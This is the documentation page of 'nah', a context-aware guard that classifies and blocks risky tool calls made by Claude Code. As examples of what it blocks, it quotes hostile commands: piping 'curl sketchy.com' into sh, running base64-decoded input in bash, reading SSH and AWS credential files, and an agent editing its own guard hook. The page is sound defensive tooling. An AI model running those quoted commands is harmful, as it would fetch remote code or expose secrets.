Home
Context aware safety guard for Claude Code.
Because allow and deny isn't enough.
git push — Sure.
git push --force — nah?
rm -rf __pycache__ — Ok, cleaning up.
rm ~/.bashrc — nah.
Read ./src/app.py — Go ahead.
Read ~/.ssh/id_rsa — nah.
Write ./config.yaml — Fine.
Write ~/.bashrc with curl sketchy.com | sh — nah.
nah classifies every guarded tool call by what it actually does using contextual rules that run in milliseconds. For the ambiguous stuff, optionally route to an LLM. Every decision is logged and inspectable. Works out of the box, configure it how you want it.
Quick install¶
claude plugin marketplace add manuelschipper/nah@claude-marketplace --scope user
claude plugin install nah@nah --scope user
For CLI commands, install from PyPI. The beta terminal guard is opt-in with
nah install bash or nah install zsh; direct Claude Code hooks use
nah install claude.
What does it look like?¶
Claude: Edit → ~/.claude/hooks/nah_guard.py
nah. Edit targets hook directory (self-modification blocked)
Claude: Read → ~/.aws/credentials
nah? Read targets sensitive path: ~/.aws
Claude: Bash → npm test
✓ allowed (package_run)
Claude: Bash → base64 -d payload | bash
nah. obfuscated execution: bash receives decoded input
nah. = blocked. nah? = asks for confirmation. Everything else goes through.
What it guards¶
| Tool | What nah checks |
|---|---|
| Bash | Structural classification — action type, pipe composition, shell unwrapping |
| Read | Sensitive path detection (~/.ssh, ~/.aws, .env, ...) |
| Write | Path check + project boundary + content inspection (secrets, exfiltration, destructive payloads) |
| Edit | Path check + project boundary + content inspection on the replacement string |
| MultiEdit | Same path, boundary, content, and LLM review checks as Edit across all replacements |
| NotebookEdit | Same path, boundary, content, and LLM review checks for notebook cell source |
| Glob | Guards directory scanning of sensitive locations |
| Grep | Catches credential search patterns outside the project |
| MCP | Generic classification for third-party tool servers, with bundled coverage for known servers |
Choose what nah handles¶
By default nah actively allows safe operations for all guarded tools. Want Claude Code's normal prompts for write-like tools, but nah's protection for everything else?
# ~/.config/nah/config.yaml
active_allow: [Bash, Read, Glob, Grep]
nah still blocks and asks for dangerous operations on all guarded tools, including Write/Edit/MultiEdit/NotebookEdit and MCP tools. This only controls which safe operations get automatic allow. See active_allow for details.
Install | Configure | How it works | Getting started | Privacy